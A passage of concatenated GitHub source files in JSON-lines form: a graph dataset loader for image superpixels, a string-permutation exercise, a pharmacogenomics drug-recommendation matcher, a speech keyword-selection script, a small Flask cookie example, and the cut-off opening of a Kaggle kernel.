torch.repeat_interleave(centroid_y, shape_lengths_plus_one, output_size=shape_lengths_plus_one_size)\n shape_centroids_x = torch.repeat_interleave(centroid_x, shape_lengths_plus_one, output_size=shape_lengths_plus_one_size)\n used_shapes_y_diff = used_shapes[:,0]-shape_centroids_y\n used_shapes_x_diff = used_shapes[:,1]-shape_centroids_x\n shape_centroid_dist = torch.sqrt(used_shapes_y_diff**2+used_shapes_x_diff**2)\n shape_centroid_angle = torch.atan2(used_shapes_y_diff, used_shapes_x_diff)\n if graph_params['normalise_shapes'] or graph_params['superpixel_rotation_information']:\n cumsum_idx_biggest_distance = torch.index_select(all_data,0,get_consecutive_idxs(biggest_distance_shape_idx_offset, nr_superpixels)).to(torch.long)+cumsum_shape_lengths+arange_shape_lengths\n else:\n cumsum_idx_biggest_distance = None\n if graph_params['superpixel_rotation_information']:\n biggest_angle = shape_centroid_angle[cumsum_idx_biggest_distance]\n shape_centroid_angle-=torch.repeat_interleave(biggest_angle, shape_lengths_plus_one, output_size=shape_lengths_plus_one_size)\n shape_centroid_angle[actual_cumsum_shape_lengths+arange_shape_lengths] = 0\n if graph_params['normalise_node_data']:\n used_angle = biggest_angle.unsqueeze(1)\n else:\n used_angle = (biggest_angle.unsqueeze(1)+torch.pi)/(torch.pi*2)\n x = torch.hstack((x,used_angle))\n used_statistics = torch.vstack((used_statistics, statistics.view(statistics.shape[0]//2,2)[7,:]))\n # for normalisation we need to also use the indices of the node with the highest distance from the center in a superpixel\n if graph_params['normalise_shapes']:\n biggest_distance = used_shapes[cumsum_idx_biggest_distance]\n shape_norm_distances = torch.sqrt((torch.repeat_interleave(biggest_distance[:,0], shape_lengths_plus_one, output_size=shape_lengths_plus_one_size)-\n shape_centroids_y)**2+(torch.repeat_interleave(biggest_distance[:,1], shape_lengths_plus_one, output_size=shape_lengths_plus_one_size)-shape_centroids_x)**2)\n shape_norm_distances[shape_norm_distances==0]=1\n shape_centroid_dist/=shape_norm_distances\n edge_norm_used_shapes = torch.stack((shape_centroid_dist*torch.sin(shape_centroid_angle), shape_centroid_dist*torch.cos(shape_centroid_angle))).t().flatten().contiguous()\n if graph_params['polar_shapes']:\n used_shapes = torch.stack((shape_centroid_dist, (shape_centroid_angle+torch.pi)/(torch.pi*2))).t().contiguous()\n else:\n used_shapes = edge_norm_used_shapes\n\n used_shapes=used_shapes.flatten()\n \n double_shape_lengths = shape_lengths*2\n # since the (0,0) centers of the shapes are interspersed in the contour data, we need to filter them out if the center option is not used\n if not graph_params['include_shape_centers']:\n edge_norm_idxs = get_consecutive_idxs(double_cumsum_shape_lengths+2*arange_shape_lengths, double_shape_lengths)\n sub_x = torch.index_select(used_shapes,0,edge_norm_idxs).view(shape_lengths_size,2)\n else:\n sub_x = used_shapes.view(edge_norm_used_shapes.shape[0]//2,2)\n\n # for the shape edges, we generate them dynamically so that we don't have to store them in the dataset\n # and thus the size of the dataset is greatly reduced\n # since they have to be sorted in a way specific to the sparse tensor representation (first by row then by column)\n # we need to do some pattern-based vectorised generation for efficiency\n # these are mostly constructing the beginning, middle, and end parts of each contour representation vectorised\n # then merging them together\n first_begin_sub_edges = cumsum_shape_lengths+1\n second_begin_sub_edges = cumsum_shape_lengths+shape_lengths-1\n first_end_sub_edges = cumsum_shape_lengths\n second_end_sub_edges = second_begin_sub_edges-1\n\n non_zero_middle = shape_lengths != 2\n shape_lengths_non_zero_middle_minus_two = shape_lengths[non_zero_middle]-2\n \n if graph_params['include_shape_centers']:\n second_begin_sub_edges+=arange_shape_lengths\n third_begin_sub_edges = second_begin_sub_edges+1\n cumsum_arange_shape_lengths = cumsum_shape_lengths+arange_shape_lengths\n cumsum_arange_shape_lengths_non_zero_middle = cumsum_arange_shape_lengths[non_zero_middle]\n first_middle_sub_edges = get_consecutive_idxs(cumsum_arange_shape_lengths_non_zero_middle,shape_lengths_non_zero_middle_minus_two)\n sub_edges_first_cnts = torch.full((shape_lengths_size+shape_lengths_shape,), 3)\n sub_edges_first_cnts[cumsum_arange_shape_lengths+shape_lengths] = shape_lengths\n sub_edges_first = torch.repeat_interleave(torch.arange(shape_lengths_size+shape_lengths_shape), sub_edges_first_cnts, output_size=shape_lengths_size*4)\n sub_edges_second = torch.zeros(shape_lengths_size*4, dtype=torch.long)\n\n center_edge_offset = cumsum_shape_lengths*4\n center_edge_offset_triple_shape_lengths = center_edge_offset+shape_lengths*3\n \n sub_edges_second[center_edge_offset] = first_begin_sub_edges+arange_shape_lengths\n sub_edges_second[center_edge_offset+1] = second_begin_sub_edges\n sub_edges_second[center_edge_offset+2] = third_begin_sub_edges\n sub_edges_second[get_consecutive_idxs(center_edge_offset[non_zero_middle]+3, shape_lengths_non_zero_middle_minus_two*3)] = torch.stack((first_middle_sub_edges, first_middle_sub_edges+2, \n torch.repeat_interleave(second_begin_sub_edges[non_zero_middle]+1, shape_lengths_non_zero_middle_minus_two))).t().flatten()\n sub_edges_second[center_edge_offset_triple_shape_lengths-3] = first_end_sub_edges+arange_shape_lengths\n sub_edges_second[center_edge_offset_triple_shape_lengths-2] = second_end_sub_edges+arange_shape_lengths\n sub_edges_second[center_edge_offset_triple_shape_lengths-1] = third_begin_sub_edges\n sub_edges_second[get_consecutive_idxs(center_edge_offset_triple_shape_lengths, shape_lengths)]=get_consecutive_idxs(cumsum_arange_shape_lengths, shape_lengths)\n else:\n cumsum_shape_lengths_non_zero_middle = cumsum_shape_lengths[non_zero_middle]\n sub_edges_first = torch.repeat_interleave(torch.arange(shape_lengths_size), torch.full((shape_lengths_size,), 2), output_size=2*shape_lengths_size)\n sub_edges_second = torch.zeros(shape_lengths_size*2, dtype=torch.long)\n double_cumsum_double_lengths = double_cumsum_shape_lengths+double_shape_lengths\n sub_edges_second[double_cumsum_shape_lengths]=first_begin_sub_edges\n sub_edges_second[double_cumsum_shape_lengths+1] = second_begin_sub_edges\n sub_edges_second[double_cumsum_double_lengths-2] = first_end_sub_edges\n sub_edges_second[double_cumsum_double_lengths-1] = second_end_sub_edges\n sub_edges_second[get_consecutive_idxs(double_cumsum_shape_lengths[non_zero_middle]+2, shape_lengths_non_zero_middle_minus_two*2)] = torch.stack((\n get_consecutive_idxs(cumsum_shape_lengths_non_zero_middle,shape_lengths_non_zero_middle_minus_two), \n get_consecutive_idxs(cumsum_shape_lengths_non_zero_middle+2,shape_lengths_non_zero_middle_minus_two))).t().flatten()\n\n # compute edge weights if needed\n if graph_params['use_sub_edge_weights']:\n if not graph_params['include_shape_centers']:\n edge_norm_sub_x = torch.index_select(edge_norm_used_shapes,0,edge_norm_idxs).view(shape_lengths_size,2)\n else:\n edge_norm_sub_x = edge_norm_used_shapes.view(edge_norm_used_shapes.shape[0]//2,2)\n sub_edges_attr = (edge_norm_sub_x[sub_edges_first]-edge_norm_sub_x[sub_edges_second]).pow(2).sum(1).sqrt()\n else:\n sub_edges_attr = None\n\n sub_sparse_size = sub_edges_first[-1]+1\n # construct the adjacency matric batched sparse representation for the contour input\n sub_adj_t = SparseTensor(row=sub_edges_first, col=sub_edges_second, value=sub_edges_attr, sparse_sizes=(sub_sparse_size, sub_sparse_size), is_sorted=True, trust_data=True)\n if graph_params['include_shape_centers']:\n sub_batch = torch.repeat_interleave(arange_shape_lengths, shape_lengths_plus_one, output_size=shape_lengths_plus_one_size)\n else:\n sub_batch = torch.repeat_interleave(arange_shape_lengths, shape_lengths, output_size=shape_lengths_size)\n else:\n sub_x = None\n sub_adj_t = None\n sub_batch = None\n\n # normalise superpixel features if required\n if graph_params['normalise_node_data']:\n x = (x-used_statistics[:,0])/used_statistics[:,1]\n\n if graph_params['return_pool_block_data']:\n edge_index = torch.vstack((edge_index_first, edge_index_second))\n batch_lengths = nr_superpixels\n edge_batch = torch.repeat_interleave(torch.arange(num_edges.shape[0]), double_num_edges)\n else:\n edge_index = None\n batch_lengths = None\n edge_batch = None\n\n # anything that was not needed according to the parameters given for the input of the model is None, so that we save memory\n return GraphData(x=x, adj_t=adj_t, pos=pos, y=y,\n sub_x=sub_x, sub_adj_t=sub_adj_t, batch=batch,\n sub_batch=sub_batch, edge_index=edge_index, batch_lengths=batch_lengths, edge_batch=edge_batch)\n \nclass ImgGraphDataset(Dataset):\n def __init__(self, base_root_dir, data_dir, dataset_type: SupportedDatasets, split: Splits, prep_params, graph_params, \n only_create_dataset, max_out_ram_for_preprocessing, statistics_file_type):\n super().__init__()\n self.root = get_dataset_dir(base_root_dir, dataset_type)\n self.raw_dir = os.path.join(self.root, 'raw')\n if data_dir == '':\n self.data_dir = self.root\n else:\n self.data_dir = data_dir\n self.split=split\n self.dataset_type = dataset_type\n self.dataset = None\n self.processed_file_names_length = None\n self.prep_params = prep_params\n self.graph_params = graph_params\n self.statistics_file_type = statistics_file_type if statistics_file_type is not None else self.split.name\n self.processed_dir = os.path.join(self.root,\"processed\", self.get_processed_name())\n self.preprocessed_file_path = os.path.join(self.processed_dir,self.split.name)\n self.statistics_file_path = self.preprocessed_file_path.replace(self.split.name, self.statistics_file_type)\n self.max_out_ram_for_preprocessing = max_out_ram_for_preprocessing\n if dataset_type is SupportedDatasets.CIFAR10:\n self.classes = torch.arange(10)\n elif dataset_type is SupportedDatasets.IMAGENET:\n self.classes = torch.arange(1000)\n if not is_preprocessed_data_available(root=self.raw_dir, processed_dir=self.processed_dir, dataset_type=dataset_type, split=split):\n make_dataset_available_for_preprocessing(root=self.raw_dir, data_dir=self.data_dir, processed_dir=self.processed_dir, dataset_type=dataset_type, split=split)\n self.preprocess_data()\n if not only_create_dataset:\n self.load_preprocessed_data()\n\n def get_processed_name(self):\n name = f'data_{self.split.name}'\n if self.prep_params['use_slic']:\n name += '_slic'\n if self.prep_params['scale_params_to_img']:\n name += '_scaled'\n if self.prep_params['scale_only_min_size']:\n name += '_scaled_only_min_size'\n if self.prep_params['use_slic']:\n name += f'_{self.prep_params[\"compactness\"]}_{self.prep_params[\"region_size\"]}'\n else:\n name += f'_{self.prep_params[\"sigma\"]}_{self.prep_params[\"scale\"]}_{self.prep_params[\"min_size\"]}_{self.prep_params[\"approx_epsilon\"]}'\n return name\n\n def preprocess_data(self):\n mapping = 'identity_mapping' if self.dataset_type is SupportedDatasets.CIFAR10 else os.path.join(self.processed_dir,\"idx_to_name_mapping.txt\")\n if self.dataset_type is SupportedDatasets.IMAGENET and self.split.name == 'test':\n used_split_name = 'val'\n else:\n used_split_name = self.split.name\n used_raw_dir = os.path.join(self.raw_dir, used_split_name) if self.dataset_type is SupportedDatasets.CIFAR10 else os.path.join(self.data_dir, used_split_name)\n max_ram_for_data = -1\n # heuristic for determining how much RAM to require for the dataset in the preprocessing\n # the heuristic was done for 96 GB RAM available and the Felzenszwalb hyperparameters presented in the paper\n if self.max_out_ram_for_preprocessing:\n max_ram_for_data = psutil.virtual_memory()[1]//(1024*1024) - 30*1024;\n cpp_args = [\n os.path.join(os.path.dirname(os.path.dirname(os.path.realpath(__file__))),'cpp_preprocessing', 'image_to_graph_dataset'),\n used_raw_dir, \n self.processed_dir,\n self.split.name,\n mapping,\n str(self.prep_params['sigma']), \n str(self.prep_params['scale']),\n str(self.prep_params['min_size']), \n str(self.prep_params['approx_epsilon']), \n str(int(self.prep_params['use_slic'])),\n str(int(self.prep_params['region_size'])),\n str(int(self.prep_params['compactness'])),\n str(int(self.prep_params['scale_params_to_img'])),\n str(int(self.prep_params['scale_only_min_size'])),\n str(int(max_ram_for_data))\n ]\n print(f'Running processing with: {cpp_args}')\n subprocess.run(cpp_args)\n\n def load_preprocessed_data(self):\n self.data = torch.tensor(np.load(self.preprocessed_file_path+'.npy'),dtype=torch.float32)\n self.offsets = torch.tensor(np.load(self.preprocessed_file_path+'_offsets.npy'),dtype=torch.long)\n self.statistics = torch.tensor(np.load(self.statistics_file_path+'_statistics.npy'),dtype=torch.float)\n self.lengths = self.offsets[1:]-self.offsets[:-1]\n\n\n def __getitem__(self, given_idxs):\n return get_data(given_idxs=given_idxs, offsets=self.offsets, lengths=self.lengths, statistics = self.statistics, data=self.data, graph_params=self.graph_params)\n \n def __len__(self):\n return self.lengths.shape[0]\n","repo_name":"lukasknobel/ShapeGNN","sub_path":"src/data_handling/ImgGraphDataset.py","file_name":"ImgGraphDataset.py","file_ext":"py","file_size_in_byte":22657,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"38430597686","text":"#User function Template for python3\n\n\nfrom itertools import permutations\n\nclass Solution:\n def find_permutation(self, S):\n res = set()\n # sort the string in lexicographically order\n S = ''.join(sorted(S))\n for perm in permutations(S):\n # keep adding while there is next permutation\n res.add(''.join(perm))\n return sorted(list(res))\n\n\n#{ \n # Driver Code Starts\n#Initial Template for Python 3\n\n\nif __name__ == '__main__':\n\tt=int(input())\n\tfor i in range(t):\n\t\tS=input()\n\t\tob = Solution()\n\t\tans = ob.find_permutation(S)\n\t\tfor i in ans:\n\t\t\tprint(i,end=\" \")\n\t\tprint()\n# } Driver Code Ends","repo_name":"shibam120302/LeetCode","sub_path":"Permutations of a given string - GFG/permutations-of-a-given-string.py","file_name":"permutations-of-a-given-string.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"41157200386","text":"import os\nfrom pkgutil import get_data\nimport re\nfrom collections import defaultdict\nfrom typing import Optional\n\nfrom loguru import logger\nfrom numpy import source\n\nfrom openpgx.cpic import create_cpic_database\nfrom openpgx.dpwg import create_dpwg_database\nfrom openpgx.fda import create_fda_database\n\nfrom openpgx.helpers import words_to_sentence, get_database\n\nDATABASES = {\n \"cpic\": create_cpic_database,\n \"dpwg\": create_dpwg_database,\n \"fda\": create_fda_database,\n}\n\n\ndef index_recommendations(all_recommendations: list) -> dict:\n result = defaultdict(lambda: {\"cpic\": [], \"dpwg\": [], \"fda\": []})\n\n for recommendation in all_recommendations:\n result[recommendation[\"drug\"]][recommendation[\"source\"]].append(recommendation)\n \n return result\n\n\nresult = {}\n\n\ndef get_best_recommendation(recommendations: list) -> dict:\n # TODO: probably more factors that number of factors needs to be considered\n \"\"\"\n example:\n {'factors': {'VKORC1': 'rs9923231 reference (C)'},\n 'guideline': 'https://www.pharmgkb.org/guidelineAnnotation/PA166104938',\n 'recommendation': 'NO action is needed for this gene-drug interaction'},\n {'factors': {},\n 'guideline': 'https://pharmgkb.org/guidelineAnnotation/PA166104979',\n 'recommendation': 'There are currently no recommendations for acenocoumarol '\n 'dosing based on CYP2C9 genotypes.\\n'}]\n \"\"\"\n def score(recommendation):\n return len(recommendation[\"factors\"].keys())\n\n return max(recommendations, key=score)\n\n\n\ndef does_encoding_match_factor(encoding: str, factor: str) -> bool:\n \"\"\"\n Checks if encoding matches factor\n\n encoding is the value of factor, e.g. \"== 5.25\", \"poor metabilizer\", \"positive\"\n factor is:\n - activity score: a range for which encoding matches factor, e.g. \">= 2.0\"\n or\n - phenotype\n or\n - genotype (in HLA cases)\n \n \"\"\"\n \n if type(encoding) == list:\n for e in encoding:\n if does_encoding_match_factor(e, factor):\n return True\n return False\n \n # activity score: \"== 2.00\" and \">= 2.00\"\n if '= ' in factor and type(encoding) != str:\n factor_operator, factor_value = factor[0:2], factor[2:]\n if factor_operator == \"==\":\n return encoding == float(factor_value)\n elif factor_operator == \">=\":\n return encoding >= float(factor_value)\n\n # In factors other than activity score (phenotype, genotype)\n return encoding == factor\n\n\n\ndef recommendation_matches_genotype(recommendation: dict, genotype: dict) -> bool:\n \"\"\"\n Checks if all factors for specific drug z\n Usage:\n\n - recommendation[\"factors\"]\n dictionary for specific drug, where keys are factor names and values are allowed factor range values:\n for example:\n {\n 'HLA-B*57:01': 'negative',\n # 'population': 'general'\n }\n - genotype\n dictionary where key is genename and value is genotype (haplotype or diplotype)\n for example: \n {'CYP2D6': '*1/*1'}\n\n \n \"\"\"\n if len(genotype) == 0:\n return len(recommendation[\"factors\"]) == 0\n\n for gene, factor in recommendation[\"factors\"].items():\n if gene not in genotype.keys():\n return False # filter out other factors than genes (example: population)\n\n if factor is None:\n return False\n\n if not does_encoding_match_factor(genotype[gene], factor):\n return False\n\n return True\n\n\ndef get_recommendation_for_drug(database: dict, drug: str, encodings: str):\n \"\"\"\n Gets best matched recommention for specific drug in specific database (cpic, dpwd, fda)\n database:\n for example:\n {\n 'recommendations': {\n 'abacavir': {\n 'factors': {'HLA-B*57:01': 'negative', 'population': 'general'},\n 'recommendation': 'Use abacavir per standard dosing guidelines',\n 'strength': 'strong',\n 'guideline': 'https://cpicpgx.org/guidelines/guideline-for-abacavir-and-hla-b/'\n },\n 'allopurinol': [...]\n },\n \"encodings\" : {\"CYP2D6\": [\"poor metabolizer\", 0.0, ...}\n \n Note: There can be more recommendations for single drug in single database (for example VKORC1 and CYP2C9 in dpwg)\n \"\"\"\n if drug not in database[\"recommendations\"]:\n return None\n\n drug_recommendations = database[\"recommendations\"][drug]\n\n matched_recommendations = []\n\n for recommendation in drug_recommendations:\n if recommendation_matches_genotype(recommendation, encodings):\n matched_recommendations.append(recommendation)\n\n if len(matched_recommendations) > 0:\n recommendation = get_best_recommendation(matched_recommendations)\n\n return recommendation\n\n return None\n\n\ndef verify_vendor_database(data):\n recommendation_gene_names = data.keys()\n recommendation_factor_names = [d[\"factors\"] for d in data.values()]\n\n\ndef create_database(sources: dict = {}):\n result = {}\n\n for name in [\"cpic\", \"dpwg\", \"fda\"]:\n result[name] = DATABASES[name](sources.get(name))\n\n return result\n\n\ndef get_drugs(database) -> list:\n drugs = []\n for source_database in database.values():\n drugs.extend(source_database[\"recommendations\"].keys())\n return drugs\n\ndef phenotyping(genotypes: dict, database: dict ) -> dict:\n \"\"\"\n Performs translation, changing genotype to encoding according to encodings taken from databases.\n genotype: according to main input example.json\n database: dictionary with databases names as keys (cpic, fda, dpwg) and \"recommendations\" and \"encodings\"\n \"\"\"\n cpic_encodings = database[\"cpic\"][\"encodings\"]\n dpwg_encodings = database[\"dpwg\"][\"encodings\"]\n fda_encodings = database[\"fda\"][\"encodings\"] #TODO implement encodings from DPWG and FDA also\n phenotyping_result = {}\n for gene, genotype in genotypes.items():\n sorted_genotype = \"/\".join(sorted(genotype.split(\"/\")))\n phenotyping_result[gene] = []\n for encodings in [cpic_encodings, dpwg_encodings]:\n if gene in encodings and sorted_genotype in encodings[gene]:\n phenotyping_result[gene] = encodings[gene][sorted_genotype]\n return phenotyping_result\n \n \ndef get_recommendations_for_patient(genotypes: dict) -> dict:\n \"\"\"\n 1. Creates database with all databases data (cpic, fda, dpwg). Including recommendations + encodings for each\n 2. Performs phenotyping (using encodings). Example:\n \"encodings\": {\"NUDT15\": {\n \"*1/*1\": [\n \"normal metabolizer\"\n ],\n \"*1/*3\": [\n \"intermediate metabolizer\"\n ]}\n 2. Creates recommendation dictionary for each drug in database\n if genotype translated to encoding matches factors in recomendation\n\n genotype: dictionary with all genes that were genotyped for specific patient, according to example.json\n \"\"\"\n recommendations = defaultdict(dict)\n\n database = get_database()\n\n drugs = get_drugs(database)\n \n genotypes_translated_to_encodings = phenotyping(genotypes, database)\n\n \n for drug in drugs:\n recommendations[drug] == defaultdict(list)\n for source, source_database in database.items():\n recommendations[drug][source] = []\n recommendation = get_recommendation_for_drug(\n source_database, drug, genotypes_translated_to_encodings\n )\n\n if recommendation != None:\n recommendations[drug][source].append(recommendation)\n\n return dict(recommendations)\n","repo_name":"monigenomi/openpgx","sub_path":"openpgx/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7731,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"23686134651","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport argparse\nimport random\nimport numpy as np\nfrom auto_utils import (\n load_lexicon,\n load_keywords,\n get_kw_and_word_count,\n get_word_count,\n arrange_into_freq_bins,\n get_wlen,\n get_wset,\n get_wfreq,\n write_kw_to_file,\n CAP,\n CUP,\n)\n\n\n# def do_selection(word2count, lex, word_set, max_lim, ratios):\n\n# # t_counts = []\n# # t_wlens = []\n\n# bin_dict = {} # nested dict {wfreq_1: {wlen_3: [...], wlen_4: [...], ...}, wfreq_2: {...}, ...}\n\n# for w in word_set:\n\n# freq_w = word2count[w]\n# len_w = len(lex[w])\n\n# sub_dict = {}\n# if freq_w in bin_dict:\n# sub_dict = bin_dict[freq_w]\n\n# try:\n# sub_dict[len_w].append(w)\n# except KeyError:\n# sub_dict[len_w] = [w]\n\n# bin_dict[freq_w] = sub_dict\n\n# print('------------------------------------')\n# print('bin_dict:', len(bin_dict))\n\n# selection = []\n\n# wlen_seq = np.arange(15, 4, -1).astype(int)\n\n# for i, wf in enumerate(range(1, 11, 1)):\n# try:\n# sub_selection = []\n# sub_dict = bin_dict[wf]\n# max_words_for_wf = int(max_lim * ratios[i])\n# print('max words for wf:', max_words_for_wf, end=\" \")\n# avg_per_wlen = max(2, (max_words_for_wf // len(sub_dict)))\n# print('avg no. of words per wlen:', avg_per_wlen)\n# for wlen, word_list in sub_dict.items():\n# if 3 <= wlen <= 15:\n# random.shuffle(word_list)\n# print('wf', wf, 'wlen', wlen, len(word_list))\n# if len(word_list) > avg_per_wlen:\n# sub_selection.extend(word_list[:avg_per_wlen])\n# else:\n# sub_selection.extend(word_list)\n\n# # sub_selection = sub_dict[wlen_seq[i]]\n# # random.shuffle(sub_selection)\n# selection.extend(sub_selection)\n# print(wf, ratios[i], 'cum sum:', len(selection))\n\n# except KeyError:\n# continue\n# # print(\"wf:\", wf, \"not in bin dict\")\n# # sys.exit()\n\n\n# return selection\n\n\ndef do_selection(word2count, lex, word_set, max_lim, ratios, wfreq=0):\n\n # t_counts = []\n # t_wlens = []\n\n bin_dict = (\n {}\n ) # nested dict {wfreq_1: {wlen_3: [...], wlen_4: [...], ...}, wfreq_2: {...}, ...}\n\n for w in word_set:\n\n freq_w = word2count[w]\n len_w = len(lex[w])\n\n sub_dict = {}\n if freq_w in bin_dict:\n sub_dict = bin_dict[freq_w]\n\n try:\n sub_dict[len_w].append(w)\n except KeyError:\n sub_dict[len_w] = [w]\n\n bin_dict[freq_w] = sub_dict\n\n print(\"------------------------------------\")\n print(\"bin_dict:\", len(bin_dict))\n\n selection = []\n\n # wlen_seq = np.arange(15, 3, -1).astype(int)\n\n wlen_range = [3, 16]\n\n for i, wf in enumerate(range(1, 25, 1)):\n if wfreq != 0 and wf != wfreq:\n continue\n try:\n sub_selection = []\n sub_dict = bin_dict[wf]\n max_words_for_wf = int(max_lim * ratios[i])\n print(\"max words for wf:\", wf, max_words_for_wf, end=\" \")\n avg_per_wlen = max(\n max_words_for_wf // len(sub_dict),\n (max_words_for_wf // (wlen_range[1] - wlen_range[0])),\n )\n print(\"avg no. of words per wlen:\", avg_per_wlen)\n for wlen, word_list in sub_dict.items():\n if wlen_range[0] <= wlen <= wlen_range[1]:\n random.shuffle(word_list)\n print(\"wf\", wf, \"wlen\", wlen, len(word_list))\n if len(word_list) > avg_per_wlen:\n sub_selection.extend(word_list[:avg_per_wlen])\n else:\n sub_selection.extend(word_list)\n\n # sub_selection = sub_dict[wlen_seq[i]]\n # random.shuffle(sub_selection)\n selection.extend(sub_selection)\n print(wf, ratios[i], \"cum sum:\", len(selection))\n\n except KeyError:\n continue\n # print(\"wf:\", wf, \"not in bin dict\")\n # sys.exit()\n\n return selection\n\n\ndef main():\n \"\"\" main method \"\"\"\n\n # keywords = set()\n # with open(args.keywords_file, \"r\", encoding=\"utf-8\") as fpr:\n # for line in fpr:\n # if len(line.strip().split()) == 2:\n # keywords.add(line.strip().split()[-1])\n # else:\n # keywords.add(line.strip())\n\n # print(\"Loaded\", len(keywords), \"keywords from\", args.keywords_file)\n\n data_dir = args.data_dir\n\n lex = load_lexicon(os.path.join(data_dir, \"local/dict/lexicon.txt\"))\n print(\"* Lexicon:\", len(lex))\n\n train_w_count = get_word_count(os.path.join(data_dir, \"train/text\"))\n dev_w_count = get_word_count(os.path.join(data_dir, \"dev/text\"))\n test_w_count = get_word_count(os.path.join(data_dir, \"test/text\"))\n\n train_wset = get_wset(train_w_count)\n dev_wset = get_wset(dev_w_count)\n test_wset = get_wset(test_w_count)\n\n train_count = get_wfreq(train_w_count)\n dev_count = get_wfreq(dev_w_count)\n test_count = get_wfreq(test_w_count)\n\n print(\"== word occurrence ==\")\n arrange_into_freq_bins(train_count, args.max_bin)\n arrange_into_freq_bins(dev_count, args.max_bin)\n arrange_into_freq_bins(test_count, args.max_bin)\n\n print(\"== word length ==\")\n train_w_lens = get_wlen(train_w_count, lex)\n arrange_into_freq_bins(train_w_lens, args.max_bin)\n\n dev_w_lens = get_wlen(dev_w_count, lex)\n arrange_into_freq_bins(dev_w_lens, args.max_bin)\n\n test_w_lens = get_wlen(test_w_count, lex)\n arrange_into_freq_bins(test_w_lens, args.max_bin)\n\n tdt_set = (test_wset & train_wset) & dev_wset\n print(f\"C = (train {CAP} dev {CAP} test):\", len(tdt_set))\n\n tt_set = (train_wset & test_wset) - tdt_set\n print(f\"T = (train {CAP} test) - C :\", len(tt_set))\n\n dt_set = (dev_wset & test_wset) - tdt_set\n print(f\"D = (dev {CAP} test) - C :\", len(dt_set))\n\n t_set = test_wset - (tdt_set | tt_set | dt_set)\n print(f\"test - (C {CUP} T {CUP} D) :\", len(t_set))\n\n # tdt_counts = [test_w_count[w] for w in tdt_set]\n # arrange_into_freq_bins(tdt_counts, args.max_bin)\n\n # if args.wfreq == 0:\n\n # max_lim = int(args.num_kw * args.test_ratio)\n # ratios = [.13, .12, .12, .12, .12, .12, .09, .07, .06, .05]\n # sel_tdt = do_selection(test_w_count, lex, tdt_set, max_lim, ratios)\n\n # max_lim = int(args.num_kw * args.test_ratio)\n # sel_tt = do_selection(test_w_count, lex, tt_set, max_lim, ratios)\n\n # max_lim = int(args.num_kw * args.test_ratio)\n # sel_dt = do_selection(test_w_count, lex, dt_set, max_lim, ratios)\n\n # max_lim = int(args.num_kw * args.test_ratio)\n # sel_t = do_selection(test_w_count, lex, t_set, max_lim, ratios)\n\n # print(len(sel_tdt), len(sel_tt), len(sel_dt), len(sel_t))\n # all_kw = sel_tdt + sel_tt + sel_dt + sel_t\n\n # write_kw_to_file(sel_tdt, args.out_file + \"_tdt\")\n # write_kw_to_file(sel_tt, args.out_file + \"_tt\")\n # write_kw_to_file(sel_dt, args.out_file + \"_dt\")\n # write_kw_to_file(sel_t, args.out_file + \"_t\")\n\n # else:\n # # Select keywords corresponding to this wfreq only\n\n # args.test_ratio = 1\n\n max_lim = int(args.num_kw * args.test_ratio)\n ii = np.sort(np.random.randint(1, 1000, size=(args.max_wfreq)))[::-1]\n ratios = ii / ii.sum()\n print(\"ratios:\", ratios.tolist())\n\n sel_tdt = do_selection(test_w_count, lex, tdt_set, max_lim, ratios, args.wfreq)\n\n max_lim = int(args.num_kw * args.test_ratio)\n sel_tt = do_selection(test_w_count, lex, tt_set, max_lim, ratios, args.wfreq)\n\n max_lim = int(args.num_kw * args.test_ratio)\n sel_dt = do_selection(test_w_count, lex, dt_set, max_lim, ratios, args.wfreq)\n\n max_lim = int(args.num_kw * args.test_ratio)\n sel_t = do_selection(test_w_count, lex, t_set, max_lim, ratios, args.wfreq)\n\n print(len(sel_tdt), len(sel_tt), len(sel_dt), len(sel_t))\n all_kw = sel_tdt + sel_tt + sel_dt + sel_t\n\n write_kw_to_file(sel_tdt, args.out_file + \"_tdt\")\n write_kw_to_file(sel_tt, args.out_file + \"_tt\")\n write_kw_to_file(sel_dt, args.out_file + \"_dt\")\n write_kw_to_file(sel_t, args.out_file + \"_t\")\n\n write_kw_to_file(all_kw, args.out_file)\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter\n )\n # parser.add_argument(\"keywords_file\", help=\"path to keywords file\")\n parser.add_argument(\"data_dir\", help=\"path to data dir\")\n parser.add_argument(\"out_file\", help=\"path to save keywords\")\n parser.add_argument(\"-max_wfreq\", type=int, default=25)\n parser.add_argument(\"-max_bin\", type=int, default=25)\n parser.add_argument(\n \"-num_kw\", type=int, default=5000, help=\"desired number of keywords\"\n )\n parser.add_argument(\n \"-test_ratio\",\n type=float,\n default=0.5,\n help=\"ratio of total keywords to test-only keywords\",\n )\n parser.add_argument(\"-wfreq\", default=0, type=int)\n args = parser.parse_args()\n\n main()\n","repo_name":"skesiraju/indic-kws","sub_path":"kaldi_recipes/local/auto_kw_selection_v2.py","file_name":"auto_kw_selection_v2.py","file_ext":"py","file_size_in_byte":9294,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"11283313990","text":"from flask import render_template, Blueprint, make_response, request\n\nmain = Blueprint('main', __name__)\n\n@main.route(\"/\")\n@main.route(\"/home\")\ndef\thome():\n\tresp = make_response(render_template(\"home.html\"))\n\tresp.set_cookie(\"userID\", \"12345\")\n\n\treturn resp\n\n@main.route(\"/getCookie\")\ndef getCookie():\n\tuserID = request.cookies.get(\"userID\")\n\n\treturn 'user ID is ' + userID\n\n@main.route(\"/delCookie\")\ndef delCookie():\n\tresp = make_response(\"deleting cookie\")\n\tresp.set_cookie(\"userID\", '', expires = 0)\n\n\treturn resp\n\n","repo_name":"sg-kim/python_flask","sub_path":"16_cookie_and_session/cookieAndSession/main/cookie_exercise.py","file_name":"cookie_exercise.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2450284735","text":"#based on the following kernel: https://www.kaggle.com/hyeonho/pca-nusvc-0-95985\n\nimport numpy as np, pandas as pd\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.metrics import roc_auc_score\nfrom 